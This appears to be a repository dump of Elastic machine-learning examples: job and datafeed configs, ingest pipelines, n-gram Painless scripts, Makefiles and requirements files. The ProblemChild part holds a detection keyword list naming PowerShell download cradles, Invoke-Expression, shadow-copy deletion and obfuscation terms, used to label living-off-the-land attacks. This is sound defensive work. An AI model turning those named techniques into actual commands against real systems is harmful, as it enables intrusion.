 8 |     full_tweet         => true
 9 |     add_field => { "fields.topic" => "super_heroes" }
10 |   }
11 | }
12 | 
13 | filter {
14 | 
15 | 
16 | }
17 | 
18 | output {
19 |   stdout {
20 |     codec => dots
21 |   }
22 |   elasticsearch {
23 |       hosts => "localhost:9200"
24 |       index         => "twitter-example"
25 |       document_type => "tweets"
26 |       template      => "./twitter.json"
27 |       template_name => "twitter"
28 |       template_overwrite => true
29 |       user => "elastic"
30 |       password => "changeme"
31 |   }
32 | }
33 | 


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/twitter_trends/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "datafeed_id": "datafeed-twitter_trends",
 3 |     "job_id": "twitter_trends",
 4 |     "query_delay": "60s",
 5 |     "frequency": "450s",
 6 |     "indexes": [
 7 |       "twitter-*"
 8 |     ],
 9 |     "types": [
10 |       "_default_",
11 |       "log"
12 |     ],
13 |     "query": {
14 |       "match_all": {
15 |         "boost": 1
16 |       }
17 |     },
18 |     "scroll_size": 1000,
19 |     "chunking_config": {
20 |       "mode": "auto"
21 |     }
22 | }


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/twitter_trends/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "twitter_trends",
 3 |   "job_type": "anomaly_detector",
 4 |   "analysis_config": {
 5 |     "bucket_span": "10m",
 6 |     "detectors": [
 7 |       {
 8 |         "detector_description": "high_count (twitter_trends)",
 9 |         "function": "high_count",
10 |         "partition_field_name": "fields.topic",
11 |         "detector_rules": []
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "fields.topic",
16 |       "entities.hashtags.text",
17 |       "entities.user_mentions.name",
18 |       "retweeted_status.entities.user_mentions.name",
19 |       "user.name",
20 |       "user.location",
21 |       "entities.urls.display_url",
22 |       "retweeted_status.entities.hashtags.text",
23 |       "retweeted_status.entities.urls.display_url"
24 |     ]
25 |   },
26 |   "data_description": {
27 |     "time_field": "created_at",
28 |     "time_format": "epoch_ms"
29 |   }
30 | }
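To run this recipe, the job above and its datafeed can be created through the ML APIs. A minimal sketch with the Python client, assuming Elasticsearch on localhost:9200 and the two JSON files saved at the paths shown; note the recipe predates 7.x, so legacy fields such as `types` (and possibly `indexes` and `detector_rules`) would need cleaning up on a modern cluster:

```python
import json

from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")

with open("machine_learning/job.json") as f:
    job = json.load(f)
with open("machine_learning/data_feed.json") as f:
    datafeed = json.load(f)

# The ids belong in the URL, not the request body.
job_id = job.pop("job_id")
datafeed_id = datafeed.pop("datafeed_id")
job.pop("job_type", None)       # server-assigned
datafeed.pop("types", None)     # pre-7.x field; other legacy fields may remain

es.ml.put_job(job_id=job_id, body=job)
es.ml.put_datafeed(datafeed_id=datafeed_id, body=datafeed)

# Open the job and start the datafeed to begin analyzing tweets.
es.ml.open_job(job_id=job_id)
es.ml.start_datafeed(datafeed_id=datafeed_id)
```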


--------------------------------------------------------------------------------
/Machine Learning/Class Assigment Objectives/requirements.txt:
--------------------------------------------------------------------------------
 1 | eland==7.10.1b1
 2 | elasticsearch==7.10.1
 3 | jupyter==1.0.0
 4 | matplotlib==3.3.4
 5 | numpy==1.19.5
 6 | pandas==1.1.5
 7 | requests==2.25.1
 8 | scikit-learn==0.24.1
 9 | seaborn==0.11.1
10 | 


--------------------------------------------------------------------------------
/Machine Learning/DGA Detection/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | This folder contains the supplementary materials for the following blog posts:
 3 | 
 4 | 
 5 | ### Machine learning in cybersecurity: Training supervised models to detect DGA activity
 6 | * [blogpost](https://www.elastic.co/blog/machine-learning-in-cybersecurity-training-supervised-models-to-detect-dga-activity)
 7 | * [supplementary materials](training-supervised-models-to-detect-dga-activity.md)
 8 | 
 9 | ### Machine learning in cybersecurity: Detecting DGA activity in network data
10 | * [blogpost](https://www.elastic.co/blog/machine-learning-in-cybersecurity-detecting-dga-activity-in-network-data)
11 | * [supplementary materials](detecting-dga-activity-in-network-data.md)
12 | 
13 | 


--------------------------------------------------------------------------------
/Machine Learning/DGA Detection/ngram-extractor-reindex.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "script": {
 3 |     "lang": "painless",
 4 |     "source": """
 5 | String nGramAtPosition(String fulldomain, int fieldcount, int n){
 6 |   String domain = fulldomain.splitOnToken('.')[0];
 7 |   if (fieldcount+n>domain.length()){
 8 |     return ''
 9 |   }
10 |   else {
11 |     return domain.substring(fieldcount, fieldcount+n)
12 |   }
13 | }
14 | for (int i=0;i<ctx['domain'].length();i++){
15 |   ctx[Integer.toString(params.ngram_count)+'-gram_field'+Integer.toString(i)] = nGramAtPosition(ctx['domain'], i, params.ngram_count)
16 | }
17 |  """
18 |   }
19 | }
20 | 
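The script above reads fields directly off `ctx`, which matches the ingest script-processor context, so one way to apply it during a reindex is to register it in a pipeline and point the reindex destination at that pipeline. A minimal sketch; the pipeline id and index names are assumptions, and the script is inlined because the triple-quoted console syntax above is not plain JSON:

```python
from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")

# The script body from ngram-extractor-reindex.json.
PAINLESS = """
String nGramAtPosition(String fulldomain, int fieldcount, int n){
  String domain = fulldomain.splitOnToken('.')[0];
  if (fieldcount+n>domain.length()){
    return ''
  }
  else {
    return domain.substring(fieldcount, fieldcount+n)
  }
}
for (int i=0;i<ctx['domain'].length();i++){
  ctx[Integer.toString(params.ngram_count)+'-gram_field'+Integer.toString(i)] = nGramAtPosition(ctx['domain'], i, params.ngram_count)
}
"""

# Hypothetical pipeline id; ngram_count controls the n-gram length.
es.ingest.put_pipeline(id="ngram-extractor", body={
    "processors": [{
        "script": {"lang": "painless", "source": PAINLESS,
                   "params": {"ngram_count": 2}}
    }]
})

# Hypothetical source and destination indices; each source document is
# expected to carry a top-level `domain` field.
es.reindex(body={
    "source": {"index": "dns-events"},
    "dest": {"index": "dns-events-ngrams", "pipeline": "ngram-extractor"},
})
```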


--------------------------------------------------------------------------------
/Machine Learning/Data Frames/anonreviews.csv.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Data Frames/anonreviews.csv.bz2


--------------------------------------------------------------------------------
/Machine Learning/Feature Importance/README.md:
--------------------------------------------------------------------------------
 1 | # Feature importance for data frame analytics
 2 | 
 3 | In the notebook we assume that you have [Elasticsearch 7.6 or later](https://www.elastic.co/downloads/elasticsearch) and that you are running it locally on port 9200. If you don't, learn how to [get Elasticsearch up and running](https://www.elastic.co/guide/en/elasticsearch/reference/7.6/getting-started-install.html).
 4 | 
 5 | Set up a local instance of Jupyter using the following instructions:
 6 | 
 7 | 1. Set up a virtual environment called `env` 
 8 | 
 9 | ```
10 | python3 -m venv env
11 | ``` 
12 | 
13 | 2. Activate it
14 | 
15 | ```
16 | source env/bin/activate
17 | ```
18 | 
19 | 3. Install the required dependencies for your chosen Jupyter notebook
20 | 
21 | ```
22 | pip install -r requirements.txt
23 | ```
24 | 
25 | 4. Launch Jupyter
26 | 
27 | ```
28 | jupyter notebook
29 | ```
30 | 
31 | 
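Before launching Jupyter it can be worth confirming that the cluster described above is actually reachable. A minimal sketch, assuming the default unauthenticated localhost setup:

```python
from elasticsearch import Elasticsearch

# The notebook assumes an unsecured local cluster on port 9200.
es = Elasticsearch("http://localhost:9200")

if not es.ping():
    raise SystemExit("Elasticsearch is not reachable on localhost:9200")

# Feature importance for data frame analytics requires 7.6 or later.
print("Connected to Elasticsearch", es.info()["version"]["number"])
```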


--------------------------------------------------------------------------------
/Machine Learning/Feature Importance/requirements.txt:
--------------------------------------------------------------------------------
 1 | dash==1.8.0
 2 | dash-core-components==1.7.0
 3 | iml==0.6.2
 4 | ipykernel==5.1.3
 5 | ipywidgets==7.5.1
 6 | jupyter==1.0.0
 7 | matplotlib==3.1.1
 8 | numpy==1.18.1
 9 | plotly==4.4.1
10 | seaborn==0.10.0
11 | widgetsnbextension==3.5.1
12 | xgboost==0.90
13 | requests==2.22.0
14 | elasticsearch==7.5.1
15 | eland==7.5.1a3
16 | pandas==0.25.3
17 | psutil==5.6.7
18 | orca==1.5.3
19 | xlrd >= 1.0.0


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/README.md:
--------------------------------------------------------------------------------
1 | Each subfolder contains information that will allow you to configure, run, and test an example IT Operations machine learning use case. IT Operations use cases detect anomalies associated with errors, slowdowns, and interruptions in the operation of a system or service. Each detected anomaly is assigned a normalized Anomaly Score and is annotated with the values of other fields in the data that have a statistical influence on the anomaly; these fields are called influencers.
2 | 


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/service_response_change/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "datafeed_id": "datafeed-service_response_change",
 3 |   "job_id": "service_response_change",
 4 |   "indexes": [
 5 |     "filebeat-*"
 6 |   ],
 7 |   "types": [
 8 |     "log"
 9 |   ],
10 |   "query": {
11 |     "match_all": {}
12 |   },
13 |   "scroll_size": 1000,
14 |   "query_delay": "60s",
15 |   "frequency": "150s"
16 | }


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/service_response_change/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "service_response_change",
 3 |   "description": "service response change",
 4 |   "analysis_config": {
 5 |     "bucket_span": "30m",
 6 |     "detectors": [
 7 |       {
 8 |         "detector_description": "high_count",
 9 |         "function": "high_count",
10 |         "partition_field_name": "beat.hostname",
11 |         "detector_rules": [],
12 |         "by_field_name": "apache2.access.response_code"
13 |       }
14 |     ],
15 |     "influencers": [
16 |       "apache2.access.response_code",
17 |       "apache2.access.site_area",
18 |       "apache2.access.geoip.country_iso_code"
19 |     ]
20 |   },
21 |   "data_description": {
22 |     "format": "delimited",
23 |     "time_field": "@timestamp",
24 |     "time_format": "epoch",
25 |     "field_delimiter": "\t",
26 |     "quote_character": "\""
27 |   }
28 | }


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/system_metric_change/configs/ingest/core_id.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "Copys core id to a keyword field for ML Partition",
 3 |   "processors": [
 4 |     {
 5 |       "set": {
 6 |         "field": "_source.system.core.core_id",
 7 |         "value": "core_{{system.core.id}}"
 8 |       }
 9 |     }
10 |   ]
11 | }
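The pipeline above must be registered under the id `core_id` before Metricbeat can reference it (see the `pipeline: core_id` line in the metricbeat.yml that follows). A minimal sketch, assuming the file is read from the repo path shown:

```python
import json

from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")

with open("configs/ingest/core_id.json") as f:
    pipeline = json.load(f)

# Register under the id that metricbeat.yml's `pipeline:` setting names.
es.ingest.put_pipeline(id="core_id", body=pipeline)
```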


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/system_metric_change/configs/metricbeat/metricbeat.yml:
--------------------------------------------------------------------------------
 1 | metricbeat.modules:
 2 | - module: system
 3 |   metricsets:
 4 |     - core
 5 |   enabled: true
 6 |   period: 5s
 7 |   processes: ['.*']
 8 | name: dales 
 9 | output.elasticsearch:
10 |   hosts: ["10.10.10.112:9200"]
11 |   username: "elastic"
12 |   password: "changeme"
13 |   pipeline: core_id
14 | 


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/system_metric_change/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "system_metric_change",
 3 |   "indexes": [
 4 |     "metricbeat-*"
 5 |   ],
 6 |   "types": [
 7 |     "metricsets"
 8 |   ],
 9 |   "query": {
10 |     "term": {
11 |       "metricset.name": {
12 |         "value": "core"
13 |       }
14 |     }
15 |   },
16 |   "scroll_size": 1000,
17 |   "query_delay": "60s",
18 |   "frequency": "150s"
19 | }


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/system_metric_change/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "system_metric_change",
 3 |   "description": "system metric change",
 4 |   "analysis_config": {
 5 |     "bucket_span": "1m",
 6 |     "detectors": [
 7 |       {
 8 |         "detector_description": "high_mean(\"system.core.user.pct\") by \"system.core.core_id\" partitionfield=\"beat.name\"",
 9 |         "function": "high_mean",
10 |         "field_name": "system.core.user.pct",
11 |         "by_field_name": "system.core.core_id",
12 |         "partition_field_name": "beat.name",
13 |         "detector_rules": []
14 |       }
15 |     ],
16 |     "influencers": [
17 |       "system.core.core_id",
18 |       "beat.name"
19 |     ],
20 |     "use_per_partition_normalization": false
21 |   },
22 |   "data_description": {
23 |     "time_field": "@timestamp"
24 |   }
25 | }


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | /notebooks/.ipynb_checkpoints
3 | /venv/
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/Makefile:
--------------------------------------------------------------------------------
 1 | default: test
 2 | 
 3 | all: clean init test
 4 | 
 5 | venv/bin/activate:
 6 | 	@rm -rf venv/
 7 | 	@python3 -m venv venv
 8 | 
 9 | .PHONY: clean
10 | clean:
11 | 	@rm -rf venv/
12 | 
13 | .PHONY: init
14 | init: venv/bin/activate
15 | 	. venv/bin/activate ; \
16 | 	pip install -r requirements.txt
17 | 
18 | .PHONY: unit-test
19 | unit-test: venv/bin/activate
20 | 	. venv/bin/activate ; \
21 |     python3 -m unittest discover -s tests/unit
22 | 
23 | .PHONY: integration-test
24 | integration-test: venv/bin/activate
25 | 	. venv/bin/activate ; \
26 |     python3 -m unittest discover -s tests/integration
27 | 
28 | test: unit-test integration-test
29 | 
30 | .PHONY: jupyter
31 | jupyter: venv/bin/activate
32 | 	. venv/bin/activate ; \
33 | 	jupyter lab
34 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/bin/prepare:
--------------------------------------------------------------------------------
 1 | #!venv/bin/python
 2 | 
 3 | """
 4 | Prepares the basic resources required: indices, pipelines, transforms.
 5 | """
 6 | 
 7 | import argparse
 8 | import os
 9 | import sys
10 | 
11 | from elasticsearch import Elasticsearch
12 | 
13 | # project library
14 | sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
15 | from metrics.resources import prepare
16 | 
17 | DEFAULT_URL = 'http://localhost:9200'
18 | 
19 | 
20 | def main():
21 |     parser = argparse.ArgumentParser(prog='prepare')
22 |     parser.add_argument('--url', default=DEFAULT_URL, help="An Elasticsearch connection URL, e.g. http://user:secret@localhost:9200")
23 |     args = parser.parse_args()
24 | 
25 |     es = Elasticsearch(args.url)
26 | 
27 |     # create all resources
28 |     prepare(es)
29 | 
30 | 
31 | if __name__ == "__main__":
32 |     main()
33 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/config/pipelines/ecs-search-metrics.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "processors": [
 3 |     {
 4 |       "script": {
 5 |         "if": "(ctx.event.action == 'SearchMetrics.query' || ctx.event.action == 'SearchMetrics.page') && ctx.SearchMetrics.results.size == null",
 6 |         "source": "ctx.SearchMetrics.results.size = ctx.SearchMetrics.results.ids.size()"
 7 |       }
 8 |     },
 9 |     {
10 |       "script": {
11 |         "if": "ctx.event.action == 'SearchMetrics.click' && ctx.SearchMetrics.click.result.reciprocal_rank == null",
12 |         "source": "ctx.SearchMetrics.click.result.reciprocal_rank = 1.0 / ctx.SearchMetrics.click.result.rank"
13 |       }
14 |     }
15 |   ]
16 | }
17 | 
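The two script processors above can be sanity-checked with the ingest simulate API before being attached to an index. A minimal sketch with a hypothetical query event; the first processor should fill in `SearchMetrics.results.size` as 3:

```python
import json

from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")

with open("config/pipelines/ecs-search-metrics.json") as f:
    pipeline = json.load(f)

result = es.ingest.simulate(body={
    "pipeline": pipeline,
    "docs": [{
        "_source": {
            "event": {"action": "SearchMetrics.query"},
            # `size` is omitted, so the first processor computes it.
            "SearchMetrics": {"results": {"ids": ["a", "b", "c"]}},
        }
    }],
})

print(result["docs"][0]["doc"]["_source"]["SearchMetrics"]["results"]["size"])
```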


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/config/pipelines/ecs-search-metrics_transform_completion.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "processors" : [
 3 |     {
 4 |       "drop": {
 5 |         "if": "ctx.metrics.num_queries < 3 || ctx.metrics.mean_max_reciprocal_rank < 0.2"
 6 |       }
 7 |     }
 8 |   ],
 9 |   "on_failure" : [
10 |     {
11 |       "set" : {
12 |         "field" : "_index",
13 |         "value" : "{{_index}}_failed"
14 |       }
15 |     }
16 |   ]
17 | }
18 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/metrics/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Online Search Relevance Metrics/metrics/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/requirements.txt:
--------------------------------------------------------------------------------
 1 | # Please:
 2 | ## * use version pinning
 3 | ## * version pin to a major or minor version but not to a patch version (when possible)
 4 | ## * keep things organized and clear (sort alphabetically within each category)
 5 | ## * put common dependencies here
 6 | ## * use in-notebook `%pip install x` for one-off needs
 7 | 
 8 | # core
 9 | jupyterlab==1.1.*
10 | pip==20.*
11 | 
12 | # non-core
13 | ## misc
14 | Faker==2.0.*
15 | requests==2.24.*
16 | tqdm==4.38.*
17 | wheel==0.33.*
18 | 
19 | ## data science
20 | eland>=7.*
21 | elasticsearch==7.*
22 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/setup.py:
--------------------------------------------------------------------------------
1 | from setuptools import setup, find_packages
2 | 
3 | setup(
4 |     name='metrics',
5 |     version='0.1.0',
6 |     python_requires=">=3.7.0",
7 |     packages=find_packages(exclude=('tests', 'docs')),
8 | )
9 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Online Search Relevance Metrics/tests/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/tests/integration/__init__.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import metrics.resources as resources
 3 | 
 4 | from elasticsearch import Elasticsearch
 5 | 
 6 | ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
 7 | 
 8 | # Define test files and indices
 9 | ELASTICSEARCH_HOST = os.environ.get("ELASTICSEARCH_HOST") or "localhost"
10 | 
11 | # Define client to use in tests
12 | TEST_SUITE = os.environ.get("TEST_SUITE", "xpack")
13 | if TEST_SUITE == "xpack":
14 |     ES_TEST_CLIENT = Elasticsearch(
15 |         ELASTICSEARCH_HOST, http_auth=("elastic", "changeme"),
16 |     )
17 | else:
18 |     ES_TEST_CLIENT = Elasticsearch(ELASTICSEARCH_HOST)
19 | 
20 | METRICS_INDEX = f'{resources.INDEX}_transform_queryid'
21 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/tests/unit/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Online Search Relevance Metrics/tests/unit/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/Outlier Detection/Introduction/README.md:
--------------------------------------------------------------------------------
1 | # advent-outliers
2 | 
3 | To run this example, please ensure that you have the following:
4 | 
5 | * an elasticsearch cluster (version 7.2+) running on `localhost:9200`
6 | * the dependencies listed in `requirements.txt`. To install them, run `pip install -r requirements.txt`
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Outlier Detection/Introduction/requirements.txt:
--------------------------------------------------------------------------------
1 | jupyter
2 | numpy
3 | requests
4 | elasticsearch
5 | sklearn
6 | 


--------------------------------------------------------------------------------
/Machine Learning/Outlier Detection/README.md:
--------------------------------------------------------------------------------
1 | # Outlier Detection
2 | 
3 | This directory contains examples showcasing Elastic's outlier detection analysis within Machine Learning, released in version 7.2.
4 | 
5 | * [Introduction](Introduction/) shows you how to think about outliers in a 2-dimensional case. It walks you through building up a dataset with particular features, demonstrates how to create and start an outlier detection analysis, and shows how to analyze the outlier score and feature influence results.
6 | 


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/README.md:
--------------------------------------------------------------------------------
1 | 
2 | This folder contains the supplementary materials for the following blog post:
3 | 
4 | ### ProblemChild: Detecting living-off-the-land attacks using the Elastic Stack
5 | * [blogpost](https://www.elastic.co/blog/problemchild-detecting-living-off-the-land-attacks)
6 | * [supplementary materials](problemchild-end-to-end.md)
7 | 


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/blocklist.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "script": {
 3 |     "lang": "painless",
 4 |     "source": """
 5 |     for(item in params.blocklist){
 6 |       if(ctx['feature_command_line'].contains(item)){
 7 |         ctx.blocklist_label = 1
 8 |       }
 9 |     }
10 |    
11 |  """
12 |   }
13 | }
14 | 
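This script is intended to run as an ingest script processor, with the keywords from `blocklist_keywords.txt` (the next file) passed in as `params.blocklist`. A minimal sketch of building such a pipeline; the pipeline id is an assumption:

```python
from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")

# One keyword per line, as in blocklist_keywords.txt below.
with open("blocklist_keywords.txt") as f:
    keywords = [line.strip() for line in f if line.strip()]

# The script body from blocklist.json above.
PAINLESS = """
for(item in params.blocklist){
  if(ctx['feature_command_line'].contains(item)){
    ctx.blocklist_label = 1
  }
}
"""

# Label any document whose featurized command line contains a keyword.
es.ingest.put_pipeline(id="problemchild-blocklist", body={
    "processors": [{
        "script": {"lang": "painless", "source": PAINLESS,
                   "params": {"blocklist": keywords}}
    }]
})
```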


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/blocklist_keywords.txt:
--------------------------------------------------------------------------------
 1 | dump
 2 | -embedding
 3 | privilege
 4 | administrator
 5 | password
 6 | key
 7 | shadowcopy
 8 | delete
 9 | masquerade
10 | evil
11 | bad
12 | anonymous
13 | allprofiles
14 | .hta
15 | createobject
16 | target
17 | suspicious
18 | obfuscated
19 | bypass
20 | bootstatuspolicy
21 | recoveryenabled
22 | systemstatebackup
23 | comspec
24 | base64string
25 | .text.encoding
26 | .compression.
27 | memorystream
28 | writeallbytes
29 | webclient
30 | downloadfile
31 | downloadstring
32 | bitstransfer
33 | invoke-exp
34 | invoke-web
35 | reflection.assembly
36 | assembly.gettype
37 | sockets


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-high-sum-by-host-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a set of one or more malicious child processes on a single host. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "high sum by host",
 8 |         "function": "high_sum",
 9 |         "field_name": "problemchild.prediction_probability",
10 |         "by_field_name": "host.hostname",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "host.hostname",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-high-sum-by-parent-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a set of one or more malicious child processes spawned by the same parent process. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "high sum by parent process",
 8 |         "function": "high_sum",
 9 |         "field_name": "problemchild.prediction_probability",
10 |         "by_field_name": "process.parent.name",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "process.parent.name",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-high-sum-by-user-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a set of one or more malicious processes, started by the same user. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "high sum by user",
 8 |         "function": "high_sum",
 9 |         "field_name": "problemchild.prediction_probability",
10 |         "by_field_name": "user.name",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "user.name",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-rare-process-by-host-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a process that has been classified as malicious on a host that does not commonly manifest malicious process activity. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "rare process given a host",
 8 |         "function": "rare",
 9 |         "by_field_name": "process.name",
10 |         "partition_field_name": "host.hostname",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "host.hostname",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }
25 | 


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-rare-process-by-parent-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for rare malicious child processes spawned by a parent process. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "rare process given a parent process",
 8 |         "function": "rare",
 9 |         "by_field_name": "process.name",
10 |         "partition_field_name": "process.parent.name",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "process.parent.name",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-rare-process-by-user-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a process that has been classified as malicious where the user context is unusual and does not commonly manifest malicious process activity. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "rare process given a user",
 8 |         "function": "rare",
 9 |         "by_field_name": "process.name",
10 |         "partition_field_name": "user.name",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "user.name",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/ngram_extractor.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "script": {
 3 |     "lang": "painless",
 4 |     "source": """
 5 | String nGramAtPosition(String field, int fieldcount, int n) {
 6 |   if (fieldcount+n>field.length()) {
 7 |     return ''
 8 |   }
 9 |   else {
10 |     return field.substring(fieldcount, fieldcount+n)
11 |   }
12 | }
13 | String fieldtext = ctx[params.field];
14 | // Truncate overly long values before extracting n-grams.
15 | if (fieldtext.length() >= params.max_length) {
16 |   fieldtext = fieldtext.substring(0, params.max_length);
17 | }
18 | for (int i=0;i<(fieldtext.length());i++) {
19 |   ctx[params.field+'_'+Integer.toString(params.ngram_count)+'-gram_feature'+Integer.toString(i)] = nGramAtPosition(fieldtext, i, params.ngram_count)
20 | }
21 |  """
22 |   }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | trec_eval-9.0.7*
3 | /data/
4 | /venv/
5 | /notebooks/.ipynb_checkpoints/
6 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/Makefile:
--------------------------------------------------------------------------------
 1 | default: test
 2 | 
 3 | all: clean init test
 4 | 
 5 | venv/bin/activate:
 6 | 	rm -rf venv/
 7 | 	python3 -m venv venv
 8 | 
 9 | .PHONY: clean
10 | clean:
11 | 	rm -rf venv/
12 | 
13 | .PHONY: init
14 | init: venv/bin/activate
15 | 	. venv/bin/activate ; \
16 | 	pip install -r requirements.txt
17 | 
18 | .PHONY: test
19 | test: venv/bin/activate
20 | 	. venv/bin/activate ; \
21 | 	python3 -m unittest discover -s tests
22 | 
23 | .PHONY: jupyter
24 | jupyter: venv/bin/activate
25 | 	. venv/bin/activate ; \
26 | 	jupyter lab
27 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/metric-mrr-100.json:
--------------------------------------------------------------------------------
1 | {
2 |   "mean_reciprocal_rank": {
3 |     "k": 100,
